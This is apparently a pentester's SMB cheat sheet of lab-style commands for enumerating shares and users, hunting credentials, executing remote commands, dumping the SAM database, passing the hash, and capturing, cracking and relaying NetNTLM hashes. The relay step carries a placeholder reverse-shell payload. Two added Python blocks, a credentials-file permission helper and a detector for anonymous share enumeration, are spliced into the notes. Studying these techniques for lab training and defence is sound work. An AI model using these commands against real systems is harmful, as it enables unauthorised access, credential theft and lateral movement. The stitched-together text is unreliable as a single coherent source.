[139,445] SMB Enumeration

How to interact with SMB - GUI

We can press [WINKEY] + [R] to open the Run dialog box and type the file share location, e.g.: \\192.168.220.129\Finance\

⚠️ **Note:** When running CrackMapExec, if `--exec-method` is not specified it first tries the atexec method; if that fails, specify `--exec-method smbexec` explicitly.


#List the contents of a shared folder
C:\htb> dir \\192.168.220.129\Finance\
PS C:\htb> Get-ChildItem \\192.168.220.129\Finance\

#Search for a specific word in the filename.
C:\htb>dir n:\*cred* /s /b
C:\htb>dir n:\*secret* /s /b
PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Intrusionz3r0X@htb[/htb]$ find /mnt/Finance/ -name '*cred*'   # quote the pattern so the shell does not expand it locally

#Search for a specific word within the content of the files.
c:\htb> findstr /s /i cred n:\*.*
PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
Intrusionz3r0X@htb[/htb]$ grep -rn /mnt/Finance/ -ie cred

#Download Files
smb: \> get file.txt

#Download recursive mode
smb: \Path\to\folder\> prompt off
smb: \Path\to\folder\> recurse true
smb: \Path\to\folder\> mget <folder>

#Execute local shell commands without interrupting the connection
smb: \> !<command>

# See who is connected, from which host, and to which share (run on the Samba server itself; smbstatus is not an smbclient command)
Intrusionz3r0X@htb[/htb]$ smbstatus

#------------Windows------------
#Mount shared folder (the second form passes credentials explicitly)
C:\htb> net use n: \\192.168.220.129\Finance
C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"

#Mount SMB with creds
PS C:\htb> $username = 'intrusionz3r0'
PS C:\htb> $password = 'Password123'
PS C:\htb> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred

#------------Linux------------
#sudo apt install cifs-utils.
Intrusionz3r0X@htb[/htb]$ sudo mkdir /mnt/Finance
Intrusionz3r0X@htb[/htb]$ sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance
#intrusionz3r0@kali:~$ mount -t cifs //x.x.x.x/RECURSO /mnt/HTB/FOLDER -o username=USER,password=PASS,rw
Intrusionz3r0X@htb[/htb]$ mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile
**CredentialFile:**
username=plaintext
password=Password123
domain=.
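Passing `password=` in `-o` puts the password on the command line, where it is visible in the process list and in the shell history; the credentials file avoids that, but only if nobody else on the host can read it. The following Python helper is an added example, not part of these notes: it writes such a file with owner-only permissions, parses it the way mount.cifs does, and refuses to build the mount command when the file is group- or world-readable. The function names and the temporary directory used in `demo()` are my own choices.

```python
import os
import stat
import tempfile


def write_cifs_credentials(path, username, password, domain="."):
    """Write a mount.cifs credentials file (username=/password=/domain=)
    that only its owner can read, regardless of the current umask."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(f"username={username}\npassword={password}\ndomain={domain}\n")
    os.chmod(path, 0o600)  # also fixes the mode if the file already existed
    return path


def credentials_file_is_private(path):
    """True when no group or other permission bit is set on the file."""
    mode = os.stat(path).st_mode
    return not (mode & (stat.S_IRWXG | stat.S_IRWXO))


def parse_credentials_file(path):
    """Parse key=value lines as mount.cifs does; blank lines and '#' comments are skipped."""
    creds = {}
    with open(path) as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            key, _, value = line.partition("=")
            creds[key.strip()] = value.strip()
    for required in ("username", "password"):
        if required not in creds:
            raise ValueError(f"{path}: missing '{required}='")
    return creds


def build_mount_command(share, mountpoint, cred_path):
    """Return the mount(8) argv that references the credentials file instead of
    passing the password in -o; refuse to proceed if the file is not private."""
    if not credentials_file_is_private(cred_path):
        raise PermissionError(f"{cred_path} is readable by other users; run: chmod 600 {cred_path}")
    parse_credentials_file(cred_path)  # fail early on a malformed file
    return ["mount", "-t", "cifs", "-o", f"credentials={cred_path}", share, mountpoint]


def demo():
    """Exercise the helpers in a temporary directory and report what happened
    (constructed values; nothing is actually mounted)."""
    workdir = tempfile.mkdtemp()
    cred_path = write_cifs_credentials(os.path.join(workdir, "finance.cred"), "plaintext", "Password123")
    creds = parse_credentials_file(cred_path)
    argv = build_mount_command("//192.168.220.129/Finance", "/mnt/Finance", cred_path)
    os.chmod(cred_path, 0o644)  # simulate a careless chmod on the credentials file
    try:
        build_mount_command("//192.168.220.129/Finance", "/mnt/Finance", cred_path)
        refused = False
    except PermissionError:
        refused = True
    return {"creds": creds, "argv": argv, "refused_when_world_readable": refused}


if __name__ == "__main__":
    print(demo())
```

The permission check is the part worth keeping: a credentials file is only an improvement over `-o password=` when it is not readable by every local user, and a script that builds the mount command is the natural place to enforce that.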

#-----------------------------

#Enumeration using smbclient
Intrusionz3r0X@htb[/htb]$ smbclient -N -L //10.129.14.128
intrusionz3r0@htb:~$ smbclient -L x.x.x.x -U "null" -N
Intrusionz3r0X@htb[/htb]$ smbclient //10.129.14.128/notes
intrusionz3r0@kali:~$ smbget -rR smb://x.x.x.x/Secure$/IT/Carl/ -U "jamon"

# Auth by Kerberos (point KRB5CCNAME at the ticket cache; -k makes impacket use it)
Intrusionz3r0X@htb[/htb]$ export KRB5CCNAME=<user>.ccache
Intrusionz3r0X@htb[/htb]$ impacket-smbclient <domain>/<username>:<password>@<target> -k

#Nmap Scan
Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p139,445

#Brute Forcing User RIDs
Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128

#Enumeration using SMBmap
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128
Intrusionz3r0X@htb[/htb]$ smbmap -r -H x.x.x.x -u "null"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 -r <resource>
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\note.txt"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

#Enumeration using CrackMapExec (when targeting a non-domain-joined computer add: --local-auth)
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.14.128 --shares -u '' -p ''
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.11.222 --shares -u 'null' -p ''

#Enumeration using enum4linux
Intrusionz3r0X@htb[/htb]$ ./enum4linux-ng.py 10.10.11.45 -A -C
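On the server side, the null-session listings above (smbclient -N -L, smbmap -u "null", crackmapexec --shares -u '' -p '', enum4linux) leave a recognisable trace in the Windows Security log: a network logon by ANONYMOUS LOGON (event 4624, logon type 3) followed within seconds by accesses to several shares, IPC$ first (event 5140, which requires the "Audit File Share" policy to be enabled). The following Python script is an added example and not part of these notes: the records in SAMPLE_EVENTS are constructed and reduced to the fields the checks need, and the thresholds (three distinct shares within 60 seconds) are my assumptions, not a published rule.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs), reduced to the Windows Security
# log fields the checks below use: 4624 = logon, 5140 = network share accessed.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "event_id": 4624, "logon_type": 3,
     "account": "ANONYMOUS LOGON", "src_ip": "10.10.14.5", "share": None},
    {"time": "2024-05-01T10:00:01", "event_id": 5140, "logon_type": None,
     "account": "ANONYMOUS LOGON", "src_ip": "10.10.14.5", "share": "IPC$"},
    {"time": "2024-05-01T10:00:02", "event_id": 5140, "logon_type": None,
     "account": "ANONYMOUS LOGON", "src_ip": "10.10.14.5", "share": "Finance"},
    {"time": "2024-05-01T10:00:02", "event_id": 5140, "logon_type": None,
     "account": "ANONYMOUS LOGON", "src_ip": "10.10.14.5", "share": "ADMIN$"},
    {"time": "2024-05-01T10:00:03", "event_id": 5140, "logon_type": None,
     "account": "ANONYMOUS LOGON", "src_ip": "10.10.14.5", "share": "C$"},
    {"time": "2024-05-01T10:00:03", "event_id": 5140, "logon_type": None,
     "account": "ANONYMOUS LOGON", "src_ip": "10.10.14.5", "share": "notes"},
    # A normal user mapping one share: authenticated, one share, no burst.
    {"time": "2024-05-01T10:05:00", "event_id": 4624, "logon_type": 3,
     "account": "jdoe", "src_ip": "10.10.14.22", "share": None},
    {"time": "2024-05-01T10:05:01", "event_id": 5140, "logon_type": None,
     "account": "jdoe", "src_ip": "10.10.14.22", "share": "Finance"},
    {"time": "2024-05-01T10:47:00", "event_id": 5140, "logon_type": None,
     "account": "jdoe", "src_ip": "10.10.14.22", "share": "IPC$"},
]


def parse_time(value):
    return datetime.fromisoformat(value)


def find_anonymous_network_logons(events):
    """Null sessions show up as network (type 3) logons by ANONYMOUS LOGON."""
    return [e for e in events
            if e["event_id"] == 4624 and e["logon_type"] == 3
            and e["account"] == "ANONYMOUS LOGON"]


def find_share_enumeration(events, min_shares=3, window=timedelta(seconds=60)):
    """Return {src_ip: [shares]} for sources that touch at least min_shares
    distinct shares inside any sliding window of the given length."""
    accesses = defaultdict(list)
    for e in events:
        if e["event_id"] == 5140 and e["share"]:
            accesses[e["src_ip"]].append((parse_time(e["time"]), e["share"]))
    alerts = {}
    for src_ip, hits in accesses.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            seen = {share for t, share in hits[i:] if t - start <= window}
            if len(seen) >= min_shares:
                alerts[src_ip] = sorted(seen)
                break
    return alerts


if __name__ == "__main__":
    for e in find_anonymous_network_logons(SAMPLE_EVENTS):
        print(f"anonymous network logon from {e['src_ip']} at {e['time']}")
    for src_ip, shares in find_share_enumeration(SAMPLE_EVENTS).items():
        print(f"share enumeration from {src_ip}: {', '.join(shares)}")
```

The second check is deliberately keyed on the source address rather than the account, because the enumeration tools above run unauthenticated or with a throwaway name; a user who maps Finance in the morning and touches IPC$ forty minutes later is not flagged, while a client that walks five shares in two seconds is.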

#Execute commands
#Note: If --exec-method is not specified, CrackMapExec first tries the atexec method; if that fails, specify --exec-method smbexec.
Intrusionz3r0X@htb[/htb]$ impacket-psexec administrator:'Password123!'@10.10.110.17
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

#Enumerate domain users
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --users

#Enumerate the logged on users through the network
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

#Extract SAM database
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

#Pass the hash
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

#Capture users' NetNTLM v1/v2 hashes.
Intrusionz3r0X@htb[/htb]$ sudo responder -I ens33
Intrusionz3r0X@htb[/htb]$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
#If we cannot crack the hash, we can potentially relay the captured hash to another machine using impacket-ntlmrelayx.
#First, we need to set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).
Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
Intrusionz3r0X@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c '<powershellreverseshellbase64>'

Bruteforce

#Bruteforce
(Metasploit) use auxiliary/scanner/smb/smb_login

SMB Enumeration using RPCclient.

Intrusionz3r0X@htb[/htb]$ rpcclient -U "" 10.129.14.128


| Query | Description |
|---|---|
| srvinfo | Server information. |
| enumdomains | Enumerate all domains that are deployed in the network. |
| querydominfo | Provides domain, server, and user information of deployed domains. |
| netshareenumall | Enumerates all available shares. |
| netsharegetinfo <share> | Provides information about a specific share. |
| enumdomusers | Enumerates all domain users. |
| queryuser <RID> | Provides information about a specific user. |
| querygroup <RID> | Provides information about a specific group. |